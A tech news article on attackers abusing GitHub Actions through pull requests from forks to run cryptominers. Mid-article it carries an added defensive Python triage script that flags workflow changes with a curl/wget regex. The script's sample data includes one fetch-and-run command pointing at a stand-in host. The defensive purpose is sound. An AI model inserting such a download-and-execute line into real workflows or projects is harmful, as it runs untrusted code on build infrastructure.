GitHub may have been infiltrated to run cryptominers
Attacks can be traced back to November 2020
Security researchers have uncovered a massive cryptocurrency mining operation that abuses GitHub’s automated controls. According to reports, the popular open source code repository is “actively investigating” the reported incidents.
The attacks are reportedly targeted at GitHub repositories that have enabled a feature known as GitHub Actions. The feature is designed to automate the usual tasks that exist in all developer workflows.
Speaking to The Record, Dutch security engineer Justin Perdok said the attackers are specifically looking for projects that test incoming pull requests via automated jobs to inject crypto mining software into GitHub’s cloud infrastructure.
Automated abuse
According to Perdok, the attacks can be traced back to at least November 2020, when they were first reported by a French developer.
Breaking down the attack, Perdok says the threat actors first fork a software repository and add malicious GitHub Actions to the original code. They then file a legitimate pull request asking to merge their changes to the master repository.
Thanks to the automated processes, as soon as the pull request is filed, GitHub reads the malicious GitHub Actions code and spins up a virtual machine, which then downloads and runs cryptocurrency-mining software on GitHub’s infrastructure.
Perdok believes the attacks are happening at scale and has identified at least one account that’s actively creating hundreds of pull requests containing malicious code.
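A defender-side triage check for the pattern described above, as an added example that is not from the article, Perdok or GitHub: it flags pull requests from forks that touch files under `.github/workflows/` and notes added lines that download from a URL. The record layout, the function names and the download heuristic are assumptions made for this illustration, and the sample records are constructed.

```python
import re

WORKFLOW_DIR = ".github/workflows/"  # where GitHub Actions workflow files live
# Heuristic chosen for this example: an added line that downloads from a URL.
FETCH_RE = re.compile(r"\b(curl|wget)\b.*https?://", re.IGNORECASE)


def added_lines(patch):
    """Lines a unified diff adds: leading '+', but not the '+++' file header."""
    return [ln[1:] for ln in patch.splitlines()
            if ln.startswith("+") and not ln.startswith("+++")]


def triage_pull_request(pr):
    """Return findings for one PR record (hypothetical dict layout, see samples)."""
    findings = []
    if not pr["from_fork"]:
        return findings  # this example only triages pull requests filed from forks
    for changed in pr["files"]:
        if not changed["path"].startswith(WORKFLOW_DIR):
            continue
        findings.append(("workflow-changed", changed["path"]))
        for line in added_lines(changed["patch"]):
            if FETCH_RE.search(line):
                findings.append(("remote-fetch", line.strip()))
    return findings


# Constructed sample records, not real pull requests.
SAMPLE_PRS = [
    {"id": 1, "from_fork": True, "files": [
        {"path": ".github/workflows/ci.yml",
         "patch": "--- a/.github/workflows/ci.yml\n+++ b/.github/workflows/ci.yml\n"
                  "@@ -8,3 +8,4 @@\n       - uses: actions/checkout@v2\n"
                  "+      - run: curl -sL https://example.invalid/tool -o t && ./t\n"}]},
    {"id": 2, "from_fork": True, "files": [
        {"path": "README.md", "patch": "@@ -1 +1 @@\n-Helo\n+Hello\n"}]},
    {"id": 3, "from_fork": False, "files": [
        {"path": ".github/workflows/ci.yml", "patch": "@@ -1 +1 @@\n-a\n+b\n"}]},
]

if __name__ == "__main__":
    for pr in SAMPLE_PRS:
        hits = triage_pull_request(pr)
        print(pr["id"], "HOLD for review" if hits else "ok", hits)
```

A pull request with any finding would be held for a maintainer to read before its jobs are allowed to run.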
In an email to The Record, GitHub acknowledged the attack, saying they are “aware of this activity and are actively investigating”. Reportedly, they said as much to the French developer last year, before deleting the pull requests from the offending account.
We hope that GitHub’s response this time is a bit more concrete and permanent instead of just zapping the malicious pull requests.
Via: The Record
With almost two decades of writing and reporting on Linux, Mayank Sharma would like everyone to think he’s TechRadar Pro’s expert on the topic. Of course, he’s just as interested in other computing topics, particularly cybersecurity, cloud, containers, and coding.